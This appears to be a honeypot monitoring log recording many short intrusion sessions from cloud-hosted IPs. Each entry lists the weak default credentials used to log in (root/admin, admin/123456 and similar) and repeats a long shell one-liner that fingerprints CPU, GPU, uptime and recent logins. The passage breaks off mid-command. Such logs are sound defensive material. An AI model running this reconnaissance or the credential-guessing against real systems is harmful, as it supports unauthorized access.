$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 crumpet_root_7 (64.227.47.246) — Slough, United Kingdom · 14 sessions · 56 cmds

2026-03-02 02:22 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 14x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×14

$ uname -s -v -n -m 2 > /dev/null ×14

$ uname -m 2 > /dev/null ×14

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×14

🎭 spice_root_16 (139.59.93.3) — Bengaluru, India · 2 sessions · 8 cmds

2026-03-02 02:59 EST · as root/1234, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 spice_root_17 (139.59.75.109) — Bengaluru, India · 3 sessions · 12 cmds

2026-03-02 02:53 EST · as admin/password, root/12345678, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 fog_root_7 (178.62.19.141) — Slough, United Kingdom · 11 sessions · 44 cmds

2026-03-02 02:28 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 11x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×11

$ uname -s -v -n -m 2 > /dev/null ×11

$ uname -m 2 > /dev/null ×11

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×11

🎭 windmill_root_9 (167.71.14.241) — Amsterdam, Netherlands · 6 sessions · 24 cmds

2026-03-02 02:28 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 phantom_root_49 (159.223.92.215) — Singapore, Singapore · 2 sessions · 8 cmds

2026-03-02 02:38 EST · as root/1234, root/admin123

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 barbie_root_9 (209.38.89.123) — Sydney, Australia · 1 session · 4 cmds

2026-03-02 02:38 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 tulip_root_9 (178.128.246.228) — Amsterdam, Netherlands · 6 sessions · 24 cmds

2026-03-02 02:25 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 eagle_root_24 (107.170.69.144) — Secaucus, United States · 1 session · 4 cmds

2026-03-02 02:25 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 autobahn_root_17 (142.93.98.198) — Frankfurt am Main, Germany · 9 sessions · 36 cmds

2026-03-02 01:53 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 beefeater_root_9 (68.183.45.246) — Slough, United Kingdom · 7 sessions · 28 cmds

2026-03-02 01:46 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 tiger_root_11 (143.110.190.57) — Bengaluru, India · 1 session · 4 cmds

2026-03-02 01:54 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 eagle_root_25 (137.184.230.126) — Santa Clara, United States · 8 sessions · 32 cmds

2026-03-02 01:22 EST · as admin/123456, admin/admin, root/1234

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 stroopwafel_root_11 (159.65.197.221) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-03-02 01:32 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 beefeater_root_10 (161.35.165.171) — Slough, United Kingdom · 6 sessions · 24 cmds

2026-03-02 00:43 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 monsoon_root_11 (64.227.178.189) — Bengaluru, India · 7 sessions · 28 cmds

2026-03-02 00:35 EST · as admin/123456, admin/password, root/1234

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 tulip_root_17 (167.71.72.14) — Amsterdam, Netherlands · 3 sessions · 12 cmds

2026-03-02 00:38 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo 